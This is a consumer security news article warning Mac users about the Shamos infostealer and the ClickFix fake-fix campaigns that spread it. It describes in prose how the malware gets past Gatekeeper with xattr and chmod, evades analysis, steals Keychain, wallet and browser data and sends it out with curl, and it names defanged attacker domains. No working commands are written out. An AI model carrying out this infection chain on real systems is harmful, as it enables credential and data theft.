New Shamos Malware on Mac: Beware of ClickFix Attacks

Mac users are being targeted by a new wave of attacks known as ClickFix, where cybercriminals pose as guides or tools meant to fix system issues. In reality, they are distributing dangerous malware.

This threat is a variant of the well-known Atomic macOS Stealer (AMOS) and has been developed by a cybercriminal group called COOKIE SPIDER. Their goal is clear: to steal sensitive data such as browser-stored passwords, macOS Keychain items, Apple Notes, and even cryptocurrency wallets.

According to cybersecurity firm CrowdStrike, which was the first to detect this threat (now identified as Shamos), the malware has already attempted to infiltrate more than 300 systems worldwide since June 2025.

Distributed Through Fake “Fixes” in ClickFix Attacks

Malicious Sponsored Results in Google Search

Malicious GitHub Repository (Source: CrowdStrike)

Some of the websites used in these attacks—such as mac-safer[.]com or rescue-mac[.]com—pose as legitimate pages that supposedly offer solutions to common macOS issues. These sites are designed to look trustworthy and even target real search queries users might enter when experiencing problems with their Mac.

Once on the site, you're presented with detailed instructions that prompt you to copy and paste commands into the Terminal, promising to fix the issue. But in reality, you're executing malicious code that installs the malware on your system.

Read more: New Malware QuirkyLoader Distributes AsyncRAT and Agent Tesla

What the Command Actually Does

Fake Instructions to Fix Printer Issues on macOS (Source: CrowdStrike)

Once the malicious script runs, the first thing it does is capture your user password. With that, it gains the access it needs to proceed with the infection.

Next, it downloads the Shamos executable (in Mach-O format) and prepares it to run without being blocked by macOS. To do this, it uses commands such as:

1. xattr, which removes the quarantine tag that usually warns macOS the file might be dangerous.

2. chmod, which grants execution permissions to the file, allowing the malware to bypass Gatekeeper—the security feature that prevents unverified apps from running.

In short: the system thinks everything is fine, but in reality, it has just welcomed the malware without a fight.

What Does the Shamos Malware Actually Do on Your Mac?

Once Shamos runs on your device, it quietly works in the background to steal as much sensitive information as possible. But before doing that, it first ensures it's not being analyzed by security researchers or tools.

The first step is running anti-VM commands designed to detect whether the malware is operating inside a virtual machine—a common setup in security analysis. If it determines it’s in a real environment, it proceeds.

Next, it uses AppleScript to perform system reconnaissance: gathering details about the host, analyzing what data it can access, and beginning data collection.

What Data Does Shamos Steal?

Shamos targets the most valuable data on your Mac. It searches for and collects:

1. Cryptocurrency wallet files

2. macOS Keychain data

3. Notes stored in Apple Notes

4. Browser information such as passwords, cookies, history, and tokens

Once collected, all this data is compressed into a file named out.zip and sent to the attacker’s server using the curl command, which allows web requests directly from the terminal.

More Than Just Theft: It Also Downloads Additional Malware

According to CrowdStrike experts, Shamos doesn’t stop at data theft. It also has the capability to download additional malicious payloads directly into the user’s home directory.

In fact, there have been cases where attackers deployed:

1. A fake version of the Ledger Live app (used to manage cryptocurrency)

2. A botnet module, turning your Mac into part of a network of infected devices

This makes Shamos a far more complex threat than a typical infostealer—it can also pave the way for other types of cyberattacks, including ransomware or large-scale fraud.

Read more: Apple Fixes New Zero-Day Vulnerability Exploited in Attacks

How to Avoid Falling for This Trap

The best defense against Shamos (and other similar malware) is to never run Terminal commands you found online unless you fully understand what they do.

This includes scripts you come across on social media, forums, sketchy websites, or even GitHub repositories, as many cybercriminals are unfortunately using that platform to spread malicious code disguised as helpful tools.

If you’re having an issue with your Mac, avoid clicking on sponsored ads that show up in search engines—many are being used to promote these fake fixes.

Instead, rely on trusted sources like:

1. Apple’s official forums, which are moderated and verified

2. macOS’s built-in Help (open Spotlight with Cmd + Space and type “Help”)

Remember: if something sounds too good to be true (“fix your Mac in one click”), it probably is a trap.

ClickFix Attacks: Increasingly Common (and Dangerous)

ClickFix attacks are becoming a widely used tactic to spread malware. Essentially, attackers pose as technical guides or troubleshooting tools and instruct you to manually run commands in your Mac’s Terminal.

These campaigns are even spreading through:

1. TikTok videos showing supposed “hacks” to fix system issues

2. Fake CAPTCHAs designed to make you think you're unlocking legitimate content

3. Fake fixes for popular app errors, like Google Meet

This kind of attack has proven so effective that it’s already been used in ransomware campaigns—and even by state-sponsored groups.

Read more: TikTok Is Being Used to Spread Malware Through Videos

Conclusion: What Can You Do Right Now?

Shamos is a clear sign that Mac users can no longer blindly trust the security of their operating system. Today, cybercriminals are using increasingly sophisticated techniques to fool even experienced users.

If you want to keep your Mac safe, remember:

1. Don’t run commands you don’t understand

2. Avoid links and downloads from suspicious sites

3. Use trusted security tools

4. Rely on official sources when facing an issue

Your best protection is staying informed and acting with caution.